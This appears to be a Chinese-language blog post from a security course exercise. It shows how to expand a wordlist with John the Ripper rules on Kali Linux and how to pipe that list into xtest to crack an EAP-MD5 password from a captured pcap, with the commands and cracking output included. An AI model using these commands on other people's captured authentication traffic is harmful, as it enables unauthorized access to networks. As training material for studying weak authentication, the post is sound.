[Kali] 使用 John 產生字典檔加上 xtest 攻擊 EAP-MD5 協議中的密碼

[Kali] 使用 John 產生字典檔加上 xtest 攻擊 EAP-MD5 協議中的密碼

今天的課程裡面其中一個練習,是要找出 EAP-MD5 這個協議中交換的密碼~

EAP-MD5 是一種無線網路的認證協議,參考了一下 EAP-MD5-Challenge Authentication Protocol

看來是要登入時,伺服器會發一個 challenge 過來,

而 client 就得將這個 challenge 加上自己的密碼後,算一下 MD5 再送回去~

然後因為 MD5 目前是可以用字典檔來攻擊找出原始明文的,

所以就有機會先將 EAP-MD5 的網路封包錄下來,再用工具來暴力破解密碼~

  

下面的範例就是在 Kali Linux 上,先用 john 產生字典檔,

再用 xtest 讀入一個 pcap 檔和這個字典檔後,開始字典檔攻擊~

 

1. 使用 John the Ripper 產生字典檔

原始的字典檔可以從像是 sqlmap 那邊找到,

用 john -rules 可以幫忙把這些單字排列組合一下,擴大字典檔~

至於是怎麼擴大法呢?用個簡單的例子來看看吧~

 

建立一個檔案叫 z,裡面只放一個字叫 Pas:

echo "Pas" > z

 

看看 john -rules 可以幫我們做出什麼:

root@kali:/tmp# john -wordlist=z -stdout -rule
Pas
pases
pas1
Pas1
paspas
1pas
PAS
pas2
pas!
pas3
pas7
pas9
pas5
pas4
pas8
pas6
pas0
pas.
pas?
PasPas
saP
Sap
passap
paS
2pas
4pas
Pas2
Pas!
Pas3
Pas9
Pas5
Pas7
Pas4
Pas6
Pas8
Pas.
Pas?
Pas0
3pas
7pas
9pas
5pas
6pas
8pas
Pases
pased
pasing
Pased
Pasing

 

可以看到 John 幫我們用這個字產生出了非常多的延伸字,

包括改變大小寫、前後加上數字與符號、加上 es/ed/ing 等等,

讓字典檔的內容可以更加豐富~ 

 

2. 使用 xtest 讀入一個 pcap 檔和這個字典檔後,開始字典檔攻擊

這邊結合步驟 1 產生的字典檔,再導給 xtest 讀取:

root@kali:~# john -wordlist=/usr/share/wordlists/sqlmap.txt -stdout -rules | xtest -c ppp-wiredeap.pcap -w -
XTest 1.0 Running ~ Wired 802.1x Supplicant test tool implementing RFC 3748 EAP-MD5
[+] Please wait while decoding pcap file.
[+] Decoded Identity Response Value = eskoudis
[+] Decoded Identity Response Value = eskoudis
[+] Total Number of 802.1x Successful Authentication Sequences:  1
[+] Using STDIN for dictionary wordlist.
[+] Password found:  Password9
[+] Password found at line 2000199 of the dictionary file.
[+] Tried 2000199 passwords in 1.10 seconds: 1814102.80 passwords/second.

 

成功的話,就會像上面那樣,顯示 Password found,後面接找到的密碼囉~

 

(本頁面已被瀏覽過 374 次)

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料